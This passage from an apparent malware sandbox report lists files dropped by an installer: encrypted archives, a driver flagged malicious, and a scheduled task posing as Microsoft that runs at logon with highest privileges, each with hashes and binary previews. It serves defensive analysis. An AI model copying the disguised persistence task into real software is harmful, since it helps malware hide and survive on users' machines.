                            SHA-512:35199BD345DA2943A4FC27633475712F92EEBAE9D9A97206EFE69792F96A7E2A4AF80E9B031AE3C97863F8556994FF6B841BDEC484109E6AC88DB29C4573E7EF
                            Malicious:false
                            Preview:.@S....-.d.\ ................{vG.*.c.n....../..=?....sny!...&.`..0... ....G.t.....D;.{<...4.@.4c.s.....]..7.dw.6O1.R.....R.+x..1....W.....t...\......wG..*J...;.E}A.z#.J.o[C.w.3@.`@.z.....$......i\....?....2.,-..w9.......'........^r....&........o.....b......B..s.+.L~L..U.B%..xA.OW->c-kg7z...gZH.BX...:.....s..VC.....g6.RG3..\.....lZo.Y..?..y.....V.&3..x..ua.tz...j...Z.d.~.9.]......&.r.7...x..N.H.C..^f.X....B.*...x."Ih.3.."j...Ls.=...:Q0..>...z..h.......b.... .|.qD~L.87/..g....Mu........5SX....P...EY9x..pnsW<....H.Qx.s.\.JH...o.4X.Lf..R@.c.<.Yzta..[...&=UV...M..y*a.S!i.|J./<...Ml..!l.l2..z.~Y..@.(..y.T..p..)...s.d..7....I.3?..J..c..pAS|.:.|."...e._..%.)LZA.....3:_./.)s...t=K..9...^\^...[.........o{..\..jZ.....a/SQ...pio;...-H..T.aV.r..B.B.qQ...R.*1.....t.X.q..2.M..*..FI.[...t..@2...b.NXS".".e~.P........V....#.Ib.....:.....Wm......T........x-GZ:G......G..s.8A&9.....4..X.........*^..-T.T....b...;,qGpgy....1.6...Z.~s..V_B.E...E_%.,}U..T..u...L]

                            C:\Program Files (x86)\Windows NT\locale.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56562
                            Entropy (8bit):7.997362278243265
                            Encrypted:true
                            SSDEEP:768:+Avgw0HQ88PXghVEQP5JgHeJsTFlZPmXzyifCoC9DrbRJTLy+n2q5qIz/ywocZ9x:+pwAcr6kFXPmjy3pVvfRjQI26kAv0FU
                            MD5:98E4A42C940DB0871F26850402C70F94
                            SHA1:C23C68FB4172BADBA363BFE8268457218AFAACB0
                            SHA-256:447913D96FBF4EF44D75357CED22E0622633620DB56DC6BD4F88B5E2D5692A9D
                            SHA-512:38F068830CF840140612D347A872A62E78D23E5EFD4299427833C1ADEB11C690ABD96535541446E5E8EF2CF10F5217D0BAEDEC70F80A9EEF5CD0EDB07268D00C
                            Malicious:false
                            Preview:7z..'....M.O........2................&.A.......B...4.^C....v.#.m.}..(...*.|K...G.{.r...[..:D~......M...7c....-.q.........>...J.v.^{..t`...z|.w..d..*BXk.D{..\...ul.....=.......O.7.y..~.o.C.d..s.v5#...}s_....W.^..Io..Lt>9Y....7yd]wP..r..,....<s,...qbm.m..&>..zz..U....;.....b..<...N..h.......s;:...3...~M.!.vi.\.@...EB.=..o...&...S..#...c.c..^J.#.O .D....v...F..H...B<.[".>.%.c....<)....c./....D0.x.;.......0 .)...L.f.........lH...`.l....9......`..'v...eM7G.`u^..L.C....+...|r.n3>i..._.u'.zhI....y.{ca...u...h.......z6.h.D..U.1....wS.V.+...B..[.0.m....S..N.......v.kb.....t.....ky..5~v....Z.8..C.....4.>....I..x.<.t..$.lQ8..f..*..kk.D.........,.E.w.N..;.6]....L.......5r._g4...........ut...Y;.w..?.C...b.U_..F..x!...g.c....T.........N..T.1.#..Qt....2.O.$t.....rq....I.a..3:R..E.0.P./B...*..w....$g......IwX?"X.!p,.h xAC.B...GT.SQ7D......xJ"qL.C.U&...G.~....rX.S..x.R<.P...hO....O'.sZ.M.MMK..(#N.2.:'Udk..........~..4.%.J...#..2C/...@..N....-.. P..4.R..81..

                            C:\Program Files (x86)\Windows NT\locale2.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                            C:\Program Files (x86)\Windows NT\locale2.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                            C:\Program Files (x86)\Windows NT\locale3.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                            C:\Program Files (x86)\Windows NT\locale3.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                            C:\Program Files (x86)\Windows NT\locale4.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                            C:\Program Files (x86)\Windows NT\locale4.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                            C:\Program Files (x86)\Windows NT\locale7.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                            C:\Program Files (x86)\Windows NT\locale7.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:modified
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                            C:\Program Files (x86)\Windows NT\res.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):1839696
                            Entropy (8bit):7.9998860831950305
                            Encrypted:true
                            SSDEEP:24576:+HzR47j/tl3qU15r8iKxlbSpM9sTeiTt1x5IY+/1orxnLatvlpo/szCok8pYT6M4:+y7f3qIHpMAT5IYdnLaPS/sz5n
                            MD5:3FE034F663D01C52AB4B5016A2FEC51A
                            SHA1:E41E354C73BCA7427769E343B821052079F36232
                            SHA-256:B0B8A351BADE6E0D57F1EC38E5159F8B7CBD66709875A351F6F52A88F053C97C
                            SHA-512:CAB5E05C69A7B7199B79AFF2DD1477950BBC1EF56FBE17FEE167CCA499FF6E8F2A21A0825CD2E67E32EB1F3E45622FF1FBF75CACDADE537E19E7CE5E335A0D61
                            Malicious:false
                            Preview:7z..'.....N.........@.......]..v..%}..O..U.}.7|...^GJ...U..=!bV.~..u....N..j)V.....!..|.3...H.l....wo. fJ/...bn.lW.E0.g..&)(.\../.]...{U>....d.....T|....7-.R.{z.|.L.1....^..d....3{8_...C.<..Y'LQ.3.4Z...^.6.$.jDMB..V;..........n5..b..,h..W..?..t!W.O.0...1.x.....Z.v.....!.$.....J.....gPg.V.2...aD;<...Y..H]y.....e.......g.....:x.U....q.{z..:.....K...p.$]`d.2.... ...#....W/.<I..s/^.4.rUc..GE{...R...k....._.pz-F3..d..tt..T9M?...V^.m.v.....96..7..SGyB7./BtV..]..v0gb.xR.<*.....U._....."l..dQN[\ms'H.].RajI...8.;;J.W.......@RO.j.4.f..^/.#.b....v#...2e..#....z...Tr_.E.D.......Nm...job......d....;.'.M....@Ky9...M2.".w..F_j....8S61....[.Mo..Y.mf=.[....I..~.8...#.^..%R.Bu...#.D.b..tn}...!'.Xa..I=..\..`.i`VK.O......33..S.4....I.Y..........r.v..uV..C|...V.K.%.t6t.+y.......8K.a..{..z..k.1.j*=.DE....N'...N.....m_n.+.t@..).e.........8Z.Gs._...'JZ?0.\.!.......i.R?e..u!..O.7.h...W.l.m.|.K....=....q...W..a..a..k....e.9..s.Y..2.(.sy,...}......Z...A0...u..>.]S..?z....t.

                            C:\Program Files (x86)\Windows NT\tProtect.dll

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\task.xml

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3535066459795764
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnnL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnWwhldOVQOj6dKbKsz7
                            MD5:799B43ECF550F33D590F92CFC3711467
                            SHA1:672863B4F94FE693EB63AE74341CBD5B4330ABEA
                            SHA-256:8F57E4C2E94F9D06AA200B6BE6F4582E1E8FE9A0D3971F15273E6B1B152134F0
                            SHA-512:AB4608E516D311A4D5EC119A0F50D703EBEF83C55FB7E1E82AAAE1FF5165156069F3B67913F211038D555C5272E2CA3F15AE372C421656C1B9674A335EF14DAA
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNet

                            C:\Program Files (x86)\Windows NT\trash

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1589569
                            Entropy (8bit):7.999901863430879
                            Encrypted:true
                            SSDEEP:24576:v5v7d85bpwCIcOT5hc2Qe4Uz9ba8VcpMvl1JdrYdVUtuj8rGucZ+0LsX1VHqQZf8:BvGXwaOdaUzMGLAiRh7KQ5tpoR
                            MD5:77F6ED0F9554EA74050C5A8FDB365A30
                            SHA1:84111F13FB1AB25E61BD88FF0A7C4B61C40E2C8E
                            SHA-256:524961C6D57B298D6AE7B621D54C5C61C0646095C2C4D733C62A8A0D34EE7443
                            SHA-512:7B106EE9262D47C5CDB989D091842733BE6B2A5BE4230A95A6F52969CCECE7B33255FFCD5492563A00F8E408D376078AAF45DE5653CC6766C73070EA169021F4
                            Malicious:false
                            Preview:....7y|[.G...y,Ec..{.$\*....d:d.......a.oR.11;...k!..]..+=..T...L..@..fj [_..../?.f..unW%>.#.-..@ >...)j.....t.l.Z.N.;.a.........A...**.i......+...-..t}:5.,.....n..6._?._9..8_...h...9r...........fs.b.....!..s...{.E...).9..`...:c4.........2!..5`lU.f.'.X]9q.^."...x%.L%>..F..'....I..[g.6...\..`.&<.`vu...q.Oq..h~........"z......_.A/.`1..uc....D.8<3./...[.......4W..._.uO.B.n.q>.......T\.......Q..;.}..z6...m....@...2....=..zp..h......-.yG.D.8......U..)5..Y....iG.....i......A..Kq0.t..q...;........4...........4...q.f_..<...lf.y..2.......9...j..6....|...|]...q....+..XbL_...C*A^..O.*._.. ..H.e*.,.9.'.........y..hFyd..d...J.. Jz:R..l....l&....5...+.m.M,.....`..Bu.V.G,0wj..M....j..i..........~d..".3..k...Jc.HD...VG....y..<....dg....:.&..BD.\D hp.D1.s..MF...c..!.....0.A..?.....6.....}4.+......VWz.N.!.....%0..B.F.....?......*..G9I.Y0.........=..&.e.P....1..}.!....U.9........a......pnF..:d...x.fPJ...=..s.k......?...*..L.wy.......$...l$....._.....p#..&

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul9oj/tz:NllUKj/
                            MD5:1558AA0899C27353A68431EE052EC3C4
                            SHA1:A2601A25140A3703C8553959F4BD0926B31AAFB5
                            SHA-256:3F7936DF95335336DFC5C6BAF55C2628A5AFF0116500ADEE9D40B7DB3941AC88
                            SHA-512:CD213BEB302E73101224C3D40E5593661817AB724AD9A6C5DA0B3E748AD85384676573DBC36AE84FD103958CF55BEB712D7BAA8338F071BC3B5C7A9D5ED08E8C
                            Malicious:false
                            Preview:@...e...................................F............@..........

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_242y2qlb.bmd.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
